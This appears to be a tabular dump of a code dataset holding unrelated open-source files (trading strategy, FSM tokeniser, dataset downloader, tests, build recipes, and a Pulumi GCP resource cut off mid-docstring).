max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
gist_set.py | devnoname120/gist-alfred | 113 | 29515 | #!/usr/bin/python
# encoding: utf-8
from collections import Counter
from gist import create_workflow
from pprint import pprint as pp
import sys
import workflow
from workflow import Workflow, web
from workflow.background import run_in_background, is_running
def main(wf):
arg = wf.args[0]
wf.add_item(u"Set token", arg=arg, valid=True, icon="icons/token.png")
wf.send_feedback()
if __name__ == '__main__':
wf = create_workflow()
sys.exit(wf.run(main))
|
class_12/strategies/fixed_trade_price_strategy.py | taoranalex/course_codes | 121 | 29516 | <filename>class_12/strategies/fixed_trade_price_strategy.py
from howtrader.app.cta_strategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData,
BarGenerator,
ArrayManager
)
from howtrader.trader.constant import Interval
from datetime import datetime
from howtrader.app.cta_strategy.engine import CtaEngine, EngineType
import pandas_ta as ta
import pandas as pd
class FixedTradPriceStrategy(CtaTemplate):
"""
Dollar-cost averaging (fixed investment) based on price.
"""
author = "51bitquant"
fixed_trade_money = 1000 # amount of money to invest on each scheduled buy.
price_change_pct = 0.05 # price change (as a fraction) that triggers a buy
parameters = ['fixed_trade_money', 'price_change_pct']
def __init__(self, cta_engine: CtaEngine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.bg_4hour = BarGenerator(self.on_bar, 4, self.on_4hour_bar, Interval.HOUR)
self.am = ArrayManager(size=100) # time series, similar to pandas; keeps only the most recent N bars of data.
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log("策略初始化")
self.load_bar(1) # how many days of data to load; 1 means 1 day, 2 means the past 2 days
def on_start(self):
"""
Callback when strategy is started.
"""
self.write_log(f"我的策略启动")
self.put_event()
def on_stop(self):
"""
Callback when strategy is stopped.
"""
self.write_log("策略停止")
self.put_event()
def on_tick(self, tick: TickData):
pass
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
self.bg_4hour.update_bar(bar) # aggregate into 4-hour bars.
self.put_event()
def on_4hour_bar(self, bar: BarData):
"""
Callback for 4-hour bar (K-line) data.
"""
self.cancel_all() # cancel all open orders.
self.am.update_bar(bar) # push the latest bar into the time series.
# Technical indicators can be computed below...
# as well as order placement logic.
if not self.am.inited:
return
# [0,1,2,3,4,5,6]
last_close_price = self.am.close_array[-2] # close of the previous bar
current_close_price = bar.close_price # self.am.close_array[-1] # current close price
# Buy when the 4-hour price has dropped by 5%.
if (last_close_price - current_close_price)/last_close_price >= self.price_change_pct:
price = bar.close_price * 1.001
self.buy(price, self.fixed_trade_money/price)
self.put_event()
def on_order(self, order: OrderData):
"""
Order callback: called whenever the order status is updated.
"""
self.put_event()
def on_trade(self, trade: TradeData):
"""
"""
self.put_event() # refresh the UI.
def on_stop_order(self, stop_order: StopOrder):
"""
Stop-order callback, used to monitor your stop-loss orders.
"""
pass
|
external/unbound/libunbound/python/examples/async-lookup.py | simplixcurrency/simplix | 1,751 | 29530 | <reponame>simplixcurrency/simplix
#!/usr/bin/python
'''
async-lookup.py : This example shows how to use asynchronous lookups
Authors: <NAME> (vasicek AT fit.vutbr.cz)
<NAME> (xvavru00 AT stud.fit.vutbr.cz)
Copyright (c) 2008. All rights reserved.
This software is open source.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import print_function
import unbound
import time
ctx = unbound.ub_ctx()
ctx.resolvconf("/etc/resolv.conf")
def call_back(my_data,status,result):
print("Call_back:", sorted(my_data))
if status == 0 and result.havedata:
print("Result:", sorted(result.data.address_list))
my_data['done_flag'] = True
my_data = {'done_flag':False,'arbitrary':"object"}
status, async_id = ctx.resolve_async("www.nic.cz", my_data, call_back, unbound.RR_TYPE_A, unbound.RR_CLASS_IN)
while (status == 0) and (not my_data['done_flag']):
status = ctx.process()
time.sleep(0.1)
if (status != 0):
print("Resolve error:", unbound.ub_strerror(status))
|
dataloader/Dataset.py | mvemoon/TextClassificationBenchmark | 576 | 29568 | # -*- coding: utf-8 -*-
import os,urllib
class Dataset(object):
def __init__(self,opt=None):
if opt is not None:
self.setup(opt)
self.http_proxy= opt.__dict__.get("proxy","null")
else:
self.name="demo"
self.dirname="demo"
self.http_proxy="null"
self.urls=[]
self.root=".data"
self.saved_path= os.path.join(os.path.join(self.root,"clean"),self.name)
self.formated_files=None
def setup(self,opt):
self.name=opt.dataset
self.dirname=opt.dataset
self.http_proxy= opt.__dict__.get("proxy","null")
def process(self):
dirname=self.download()
print("processing dirname: "+ dirname)
raise Exception("method in father class have been called in processing: {} dataset".format(opt.dataset))
return dirname
def getFormatedData(self):
if self.formated_files is not None:
return self.formated_files
if os.path.exists(self.saved_path):
return [os.path.join(self.saved_path,filename) for filename in os.listdir(self.saved_path)]
self.formated_files = self.process()
return self.formated_files
def download_from_url(self,url, path, schedule=None):
#if schedule is None:
# schedule=lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*100)%10==0 else None
if self.http_proxy != "null":
proxy = urllib.request.ProxyHandler({'http': self.http_proxy,'https': self.http_proxy})
# construct a new opener using your proxy settings
opener = urllib.request.build_opener(proxy)
# install the openen on the module-level
urllib.request.install_opener(opener)
print("proxy in %s" % self.http_proxy)
# urllib.request.urlretrieve(url,path,lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*1000)%100==0 else None )a
try:
urllib.request.urlretrieve(url,path )
except:
# Python 2 fallback: urlretrieve lives in urllib itself (urllib2 has no urlretrieve).
urllib.urlretrieve(url, path)
return path
def download(self,check=None):
"""Download and unzip an online archive (.zip, .gz, or .tgz).
Arguments:
check (str or None): Folder whose existence indicates
that the dataset has already been downloaded, or
None to check the existence of root/{cls.name}.
Returns:
dataset_path (str): Path to extracted dataset.
"""
import zipfile,tarfile
path = os.path.join(self.root, self.name)
check = path if check is None else check
if not os.path.isdir(check):
for url in self.urls:
if isinstance(url, tuple):
url, filename = url
else:
filename = os.path.basename(url)
zpath = os.path.join(path, filename)
if not os.path.isfile(zpath):
if not os.path.exists(os.path.dirname(zpath)):
os.makedirs(os.path.dirname(zpath))
print('downloading {}'.format(filename))
self.download_from_url(url, zpath)
ext = os.path.splitext(filename)[-1]
if ext == '.zip':
with zipfile.ZipFile(zpath, 'r') as zfile:
print('extracting')
zfile.extractall(path)
elif ext in ['.gz', '.tgz',".bz2"]:
with tarfile.open(zpath, 'r:*') as tar: # 'r:*' lets tarfile auto-detect gzip or bz2 compression
dirs = [member for member in tar.getmembers()]
tar.extractall(path=path, members=dirs)
else:
print("%s do not need to be downloaded" % path)
return path
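# A minimal usage sketch, assuming a hypothetical subclass and download URL
# (neither is part of this repository):
#
# class DemoDataset(Dataset):
#     def __init__(self, opt=None):
#         super(DemoDataset, self).__init__(opt)
#         self.urls = ["http://example.com/demo_corpus.tar.gz"]
#     def process(self):
#         # download() fetches and extracts self.urls under root/name
#         return self.download()
#
# files = DemoDataset().getFormatedData()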
|
recipes/Python/578344_Simple_Finite_State_Machine_class_/recipe-578344.py | tdiprima/code | 2,023 | 29633 | #! /usr/bin/env python
""" Generic finite state machine class
Initialise the class with a list of tuples - or by adding transitions
<NAME> - November 2012
Released under an MIT License - free to use so long as the author and other contributors are credited.
"""
class fsm(object):
""" A simple to use finite state machine class.
Allows definition of multiple states, condition functions from state to state and optional callbacks
"""
def __init__(self, states=[]):
self._states=states
self.currentState = None
def start(self,startState=None):
""" Start the finite state machine
"""
if not startState or not (startState in [x[0] for x in self._states]):
raise ValueError("Not a valid start state")
self.currentState = startState
def stop(self):
""" Stop the finite state machine
"""
# Bug fix 15 Dec 2012 - self.currentState should be reset, not startState - Identified by <NAME>
self.currentState = None
def addTransition(self,fromState, toState, condition, callback=None):
""" Add a state transition to the list, order is irellevant, loops are undetected
Can only add a transition if the state machine isn't started.
"""
if self.currentState:
raise ValueError("StateMachine already Started - cannot add new transitions")
# add a transition to the state table
self._states.append( (fromState, toState,condition, callback))
def event(self, value):
""" Trigger a transition - return a tuple (<new_state>, <changed>)
Raise an exception if no valid transition exists.
Callee needs to determine if the value will be consumed or re-used
"""
if not self.currentState:
raise ValueError("StateMachine not Started - cannot process event")
# get a list of transitions which are valid
self.nextStates = [ x for x in self._states\
if x[0] == self.currentState \
and (x[2]==True or (callable(x[2]) and x[2](value))) ]
if not self.nextStates:
raise ValueError("No Transition defined from state {0} with value '{1}'".format(self.currentState, value))
elif len(self.nextStates) > 1:
raise ValueError("Ambiguous transitions from state {0} with value '{1}' -> New states defined {2}".format(self.currentState, value, [x[0] for x in self.nextStates]))
else:
if len(self.nextStates[0]) == 4:
current, next, condition, callback = self.nextStates[0]
else:
current, next, condition = self.nextStates[0]
callback = None
self.currentState, changed = (next,True) \
if self.currentState != next else (next, False)
# Execute the callback if defined
if callable(callback):
callback(self, value)
return self.currentState, changed
def CurrentState(self):
""" Return the current State of the finite State machine
"""
return self.currentState
# -------------------------------------------------------------------------------------------------
# Example classes to demonstrate the use of the Finite State Machine Class
# They implement a simple lexical tokeniser.
# These classes are not necessary for the FSM class to work.
# -------------------------------------------------------------------------------------------------
# Simple storage object for each token
class token(object):
def __init__(self, type):
self.tokenType = type
self.tokenText = ""
def addCharacter(self, char):
self.tokenText += char
def __repr__(self):
return "{0}<{1}>".format(self.tokenType, self.tokenText)
# Token list object - demonstrating the definition of state machine callbacks
class tokenList(object):
def __init__(self):
self.tokenList = []
self.currentToken = None
def StartToken(self, fss, value):
self.currentToken = token(fss.CurrentState())
self.currentToken.addCharacter(value)
def addCharacter(self, fss, value):
self.currentToken.addCharacter(value)
def EndToken(self, fss, value):
self.tokenList.append(self.currentToken)
self.currentToken = None
# Example code - showing population of the state machine in the constructor
# the Machine could also be constructed by multiple calls to addTransition method
# Example code is a simple tokeniser
# Machine transitions back to the Start state whenever the end of a token is detected
if __name__ == "__main__":
t = tokenList()
fs = fsm( [ ("Start","Start",lambda x: x.isspace() ),
("Start","Identifier",str.isalpha, t.StartToken ),
("Identifier","Identifier", str.isalnum, t.addCharacter ),
("Identifier","Start",lambda x: not x.isalnum(), t.EndToken ),
("Start","Operator", lambda x: x in "=+*/-()", t.StartToken ),
("Operator","Start", True, t.EndToken),
("Start","Number",str.isdigit, t.StartToken ),
("Number","Number",lambda x: x.isdigit() or x == ".", t.addCharacter ),
("Number","Start",lambda x: not x.isdigit() and x != ".", t.EndToken ),
("Start","StartQuote",lambda x: x == "\'"),
("StartQuote","String", lambda x: x != "\'", t.StartToken),
("String","String",lambda x: x != "\'", t.addCharacter ),
("String","EndQuote", lambda x: x == "\'", t.EndToken ),
("EndQuote","Start", True ) ] )
fs.start("Start")
a = " x123=MyString+123.65-'hello'*value"
c = 0
while c < len(a):
ret = fs.event(a[c])
# Make sure a transition back to start (from something else) does not consume the character.
if ret[0] != "Start" or (ret[0] == "Start" and ret[1] == False):
c += 1
ret = fs.event("")
print(t.tokenList)
|
src/main/python/counts_tools/exec/deviation_analysis.py | cday97/beam | 123 | 29642 | import ConfigParser
from datetime import datetime
import os
import sys
import numpy as np
import pandas as pd
import utils.counts
import utils.counts_deviation
__author__ = '<NAME>'
# This script finds the days with the greatest deviation from some reference value (such as hourly means or medians)
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'ERROR: need to supply the path to the config file'
sys.exit(1)
config_path = sys.argv[1]
conf = ConfigParser.ConfigParser()
conf.read(config_path)
# Paths
station_TS_dir = conf.get('Paths', 'station_TS_dir') # Path to station Time Series
ref_counts_file = conf.get('Paths', 'ref_counts_file')
out_file = conf.get('Paths', 'out_file') # Where to write the counts file
# Parameters
start_date = conf.get('Params', 'start_date')
end_date = conf.get('Params', 'end_date')
days = [int(d.strip()) for d in conf.get('Params', 'days').split(',')]
measure = conf.get('Params', 'measure')
# Get target dates
targ_dates = utils.counts.date_string_list(start_date, end_date, days)
# Create the counts file
ref = utils.counts.df_from_counts(ref_counts_file) # DF w/ mean flow for each link
measures = []
keepers = []
for i, stat in enumerate(ref.columns):
# Get path to stat ts file
print 'Processing station: %s' % str(stat)
print 'Number %d of %d' % (i, ref.shape[1])
ts_path = os.path.join(station_TS_dir, str(stat), 'time_series.csv')
c_dev = utils.counts_deviation.CountsDeviation(ts_path, targ_dates)
if c_dev.missing: # if there is missing data, we skip the whole station
print "Missing data. Skipping station: %s" % str(stat)
continue
c_dev.calc_measure(measure, reference=ref[stat])
measures.append(c_dev.measures[measure])
keepers.append(stat)
df = pd.DataFrame(measures).transpose()
df.columns = keepers
df.index = targ_dates
df = df.dropna(axis=1) # assign back: dropna returns a new DataFrame rather than modifying in place
df['Max_Dev'] = df.apply(np.sum, axis=1)
df.to_csv(out_file)
|
boltstream/responses.py | geekpii/boltstream | 1,735 | 29643 | from django.http import HttpResponse
class HttpResponseNoContent(HttpResponse):
status_code = 204
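# A minimal usage sketch, assuming a hypothetical Django view (the view name and
# decorator usage below are illustrative, not part of boltstream):
#
# from django.views.decorators.http import require_POST
#
# @require_POST
# def heartbeat(request):
#     # acknowledge the request without returning a body
#     return HttpResponseNoContent()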
|
res/TensorFlowPythonExamples/examples/while/__init__.py | bogus-sudo/ONE-1 | 255 | 29648 | import tensorflow as tf
i = tf.compat.v1.constant(0, name="Hole")
c = lambda i: tf.compat.v1.less(i, 10)
b = lambda i: tf.compat.v1.add(i, 1)
r = tf.compat.v1.while_loop(c, b, [i], name="While")
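# A rough sketch of evaluating the loop result, assuming TF1-style graph mode
# (e.g. after tf.compat.v1.disable_eager_execution()); with c checking i < 10 and
# b adding 1, the loop is expected to return 10:
#
# with tf.compat.v1.Session() as sess:
#     print(sess.run(r)) # -> 10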
|
recipes/mio/all/conanfile.py | rockandsalt/conan-center-index | 562 | 29654 | <reponame>rockandsalt/conan-center-index
from conans import ConanFile, tools
import os
required_conan_version = ">=1.33.0"
class MioConan(ConanFile):
name = "mio"
description = "Cross-platform C++11 header-only library for memory mapped file IO."
license = "MIT"
topics = ("mio", "mmap", "memory-mapping", "fileviewer")
homepage = "https://github.com/mandreyel/mio"
url = "https://github.com/conan-io/conan-center-index"
settings = "os", "compiler"
exports_sources = "patches/**"
@property
def _source_subfolder(self):
return "source_subfolder"
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, 11)
def package_id(self):
self.info.header_only()
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy("*pp", dst="include", src=os.path.join(self._source_subfolder, "include"))
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "mio"
self.cpp_info.names["cmake_find_package_multi"] = "mio"
self.cpp_info.components["mio-headers"].names["cmake_find_package"] = "mio-headers"
self.cpp_info.components["mio-headers"].names["cmake_find_package_multi"] = "mio-headers"
if self.settings.os == "Windows":
self.cpp_info.components["mio_full_winapi"].names["cmake_find_package"] = "mio_full_winapi"
self.cpp_info.components["mio_full_winapi"].names["cmake_find_package_multi"] = "mio_full_winapi"
self.cpp_info.components["mio_min_winapi"].names["cmake_find_package"] = "mio_min_winapi"
self.cpp_info.components["mio_min_winapi"].names["cmake_find_package_multi"] = "mio_min_winapi"
self.cpp_info.components["mio_min_winapi"].defines = ["WIN32_LEAN_AND_MEAN", "NOMINMAX"]
|
examples/titanic/assets/dataset/opener.py | eliaskousk/substra | 119 | 29663 | <reponame>eliaskousk/substra
import os
import pandas as pd
import random
import string
import numpy as np
import substratools as tools
class TitanicOpener(tools.Opener):
def get_X(self, folders):
data = self._get_data(folders)
return self._get_X(data)
def get_y(self, folders):
data = self._get_data(folders)
return self._get_y(data)
def save_predictions(self, y_pred, path):
with open(path, 'w') as f:
y_pred.to_csv(f, index=False)
def get_predictions(self, path):
return pd.read_csv(path)
def fake_X(self, n_samples=None):
data = self._fake_data(n_samples)
return self._get_X(data)
def fake_y(self, n_samples=None):
data = self._fake_data(n_samples)
return self._get_y(data)
@classmethod
def _get_X(cls, data):
return data.drop(columns=['Survived'])
@classmethod
def _get_y(cls, data):
return pd.DataFrame(data=data.get('Survived'), columns=['Survived'])
@classmethod
def _fake_data(cls, n_samples=None):
N_SAMPLES = n_samples if n_samples and n_samples <= 100 else 100
data = {
'PassengerId': list(range(N_SAMPLES)),
'Survived': [random.choice([True, False]) for k in range(N_SAMPLES)],
'Pclass': [random.choice([1, 2, 3]) for k in range(N_SAMPLES)],
'Name': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
'Sex': [random.choice(['male', 'female']) for k in range(N_SAMPLES)],
'Age': [random.choice(range(7, 77)) for k in range(N_SAMPLES)],
'SibSp': [random.choice(range(4)) for k in range(N_SAMPLES)],
'Parch': [random.choice(range(4)) for k in range(N_SAMPLES)],
'Ticket': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)],
'Fare': [random.choice(np.arange(15, 150, 0.01)) for k in range(N_SAMPLES)],
'Cabin': ["".join(random.sample(string.ascii_letters, 3)) for k in range(N_SAMPLES)],
'Embarked': [random.choice(['C', 'S', 'Q']) for k in range(N_SAMPLES)],
}
return pd.DataFrame(data)
@classmethod
def _get_data(cls, folders):
# find csv files
paths = []
for folder in folders:
paths += [os.path.join(folder, f) for f in os.listdir(folder) if f[-4:] == '.csv']
# load data
data = pd.DataFrame()
for path in paths:
data = data.append(pd.read_csv(path))
return data
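# A minimal usage sketch of the fake-data helpers above (illustrative only):
#
# opener = TitanicOpener()
# X_fake = opener.fake_X(n_samples=10) # 10 fake passenger rows with 'Survived' dropped
# y_fake = opener.fake_y(n_samples=10) # matching fake 'Survived' labels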
|
test/integration/test_natural_language_understanding_v1.py | jsstylos/waston-developer-cloud-python-sdk | 1,579 | 29664 | # coding: utf-8
from unittest import TestCase
import os
import ibm_watson
import pytest
import json
import time
from ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions
@pytest.mark.skipif(os.getenv('NATURAL_LANGUAGE_UNDERSTANDING_APIKEY') is None,
reason='requires NATURAL_LANGUAGE_UNDERSTANDING_APIKEY')
class TestNaturalLanguageUnderstandingV1(TestCase):
def setUp(self):
self.natural_language_understanding = ibm_watson.NaturalLanguageUnderstandingV1(version='2018-03-16')
self.natural_language_understanding.set_default_headers({
'X-Watson-Learning-Opt-Out': '1',
'X-Watson-Test': '1'
})
def test_analyze(self):
response = self.natural_language_understanding.analyze(
text='Bruce Banner is the Hulk and Bruce Wayne is BATMAN! '
'Superman fears not Banner, but Wayne.',
features=Features(entities=EntitiesOptions(), keywords=KeywordsOptions())).get_result()
assert response is not None
|
vit_jax/inference_time.py | fensence/Mixup-VT | 4,825 | 29722 | <reponame>fensence/Mixup-VT<gh_stars>1000+
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import time
from absl import logging
from clu import metric_writers
import flax
import flax.jax_utils as flax_utils
import jax
import jax.numpy as jnp
import ml_collections
import numpy as np
import tensorflow as tf
from vit_jax import checkpoint
from vit_jax import models
from vit_jax.configs import models as config_lib
def inference_time(config: ml_collections.ConfigDict, workdir: str):
"""Runs a number of steps and measures inference time."""
assert config.batch, f'Expected --config.batch={config.batch} > 0'
assert config.num_classes, (
f'Expected --config.num_classes={config.num_classes} > 0')
assert config.image_size, (
f'Expected --config.image_size={config.image_size} > 0')
# Build VisionTransformer architecture
model_config = config_lib.MODEL_CONFIGS[config.model_name]
model = models.VisionTransformer(
num_classes=config.num_classes, **model_config)
# Make sure initial model parameters (before replication) are on CPU only.
@functools.partial(jax.jit, backend='cpu')
def init(rng):
return model.init(
rng,
# Discard the "num_local_devices" dimension for initialization.
inputs=jnp.ones([1, config.image_size, config.image_size, 3],
jnp.float32),
train=False)
variables = init(jax.random.PRNGKey(0))
params_repl = flax_utils.replicate(variables['params'])
# pmap replicates the models over all TPUs/GPUs
vit_fn_repl = jax.pmap(functools.partial(model.apply, train=False))
images = jnp.ones([
jax.local_device_count(), config.batch // jax.local_device_count(),
config.image_size, config.image_size, 3
], jnp.float32)
writer = metric_writers.create_default_writer(workdir, asynchronous=False)
writer.write_hparams(config.to_dict())
logging.info('Starting training loop; initial compile can take a while...')
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
logging.info('Done.')
logging.info('Going to run %d inferences WITHOUT measuring...',
config.initial_steps)
for _ in range(config.initial_steps):
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
logging.info('Going to run %d inferences measuring...', config.steps)
times = []
for _ in range(config.steps):
t0 = time.time()
logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images)
logits.block_until_ready()
times.append(time.time() - t0)
logging.info('times=%s', times)
imgs_sec_core = config.batch / jax.local_device_count() / np.array(times)
logging.info('imgs_sec_core_min=%f', imgs_sec_core.min())
logging.info('imgs_sec_core_max=%f', imgs_sec_core.max())
logging.info('imgs_sec_core_mean=%f', imgs_sec_core.mean())
logging.info('imgs_sec_core_std=%f', imgs_sec_core.std())
writer.write_scalars(
0,
dict(
imgs_sec_core_min=imgs_sec_core.min(),
imgs_sec_core_max=imgs_sec_core.max(),
imgs_sec_core_mean=imgs_sec_core.mean(),
imgs_sec_core_std=imgs_sec_core.std(),
))
|
cloudmarker/test/test_azwebapphttp20event.py | TinLe/cloudmarker | 208 | 29726 | """Tests for AzWebAppHttp20Event plugin."""
import copy
import unittest
from cloudmarker.events import azwebapphttp20event
base_record = {
'ext': {
'record_type': 'web_app_config',
'cloud_type': 'azure',
'http20_enabled': True
},
'com': {
'cloud_type': 'azure'
}
}
class AzWebAppHttp20EventTest(unittest.TestCase):
"""Tests for AzWebAppHttp20Event plugin."""
def test_com_bucket_missing(self):
record = copy.deepcopy(base_record)
record['com'] = None
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_cloud_type_non_azure(self):
record = copy.deepcopy(base_record)
record['com']['cloud_type'] = 'non_azure'
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_ext_bucket_missing(self):
record = copy.deepcopy(base_record)
record['ext'] = None
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_record_type_non_web_app_config(self):
record = copy.deepcopy(base_record)
record['ext']['record_type'] = 'non_web_app_config'
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_http20_enabled(self):
record = copy.deepcopy(base_record)
record['ext']['http20_enabled'] = True
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(events, [])
def test_http20_disabled(self):
record = copy.deepcopy(base_record)
record['ext']['http20_enabled'] = False
plugin = azwebapphttp20event.AzWebAppHttp20Event()
events = list(plugin.eval(record))
self.assertEqual(len(events), 1)
self.assertEqual(events[0]['ext']['record_type'],
'web_app_http20_event')
self.assertEqual(events[0]['com']['record_type'],
'web_app_http20_event')
|
ranking/migrations/0056_auto_20201128_2316.py | horacexd/clist | 166 | 29737 | <gh_stars>100-1000
# Generated by Django 2.2.13 on 2020-11-28 23:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ranking', '0055_auto_20201009_0735'),
]
operations = [
migrations.AddIndex(
model_name='statistics',
index=models.Index(fields=['place_as_int', '-created'], name='ranking_sta_place_a_42252c_idx'),
),
]
|
examples/black_lives/create_progmem.py | fejiso/PxMatrix | 599 | 29754 | #!/usr/bin/python
import binascii
import sys
import glob, os
import pdb
file_no=0;
file_names=[];
RGB565=1;
out_string="";
def printrgb565(red, green, blue):
x1 = (red & 0xF8) | (green >> 5);
x2 = ((green & 0x1C) << 3) | (blue >> 3);
#pdb.set_trace()
this_string="0x" + str(binascii.hexlify(chr(x2))) + ",";
this_string+="0x" + str(binascii.hexlify(chr(x1))) + ",";
return this_string;
def printrgb888(red, green, blue):
this_string="0x" + str(binascii.hexlify(red)) + ",";
this_string+="0x" + str(binascii.hexlify(green)) + ",";
this_string+="0x" + str(binascii.hexlify(blue)) + ",";
return this_string;
out_string="uint8_t animation_lengths[]={";
for file in glob.glob("*.rgb"):
file_no=file_no+1;
file_names.append(str(file))
size = os.path.getsize(str(file))/64/32/3
out_string+=str(size)+ ",";
out_string=out_string[:-1];
out_string+="};\nconst uint8_t animations[] PROGMEM = {";
print (out_string)
byte_count=0;
for file_name in file_names:
size = os.path.getsize(str(file_name))
print(str(file_name)+ "- source_size: " + str(size));
with open(file_name, 'rb') as f:
byte0 = f.read(1)
while byte0 != "":
byte1 = f.read(1)
byte2 = f.read(1)
# Do stuff with byte.
if (RGB565):
out_string+=printrgb565(ord(byte0), ord(byte1), ord(byte2))
byte_count=byte_count+2;
else:
out_string+=printrgb888(byte0, byte1, byte2)
byte_count=byte_count+3;
if ((byte_count%10)==0):
out_string+="\n";
byte0 = f.read(1)
#print(str(file_name)+ "- out_size: " + str(byte_count));
out_string+="0x00};";
out_file = open("anim_data.h", "w");
out_file.write(out_string);
out_file.close();
|
sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py | sisisin/pulumi-gcp | 121 | 29762 | <filename>sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['WorkloadIdentityPoolProviderArgs', 'WorkloadIdentityPoolProvider']
@pulumi.input_type
class WorkloadIdentityPoolProviderArgs:
def __init__(__self__, *,
workload_identity_pool_id: pulumi.Input[str],
workload_identity_pool_provider_id: pulumi.Input[str],
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WorkloadIdentityPoolProvider resource.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, to restrict what otherwise valid authentication credentials issued by the
provider should not be accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
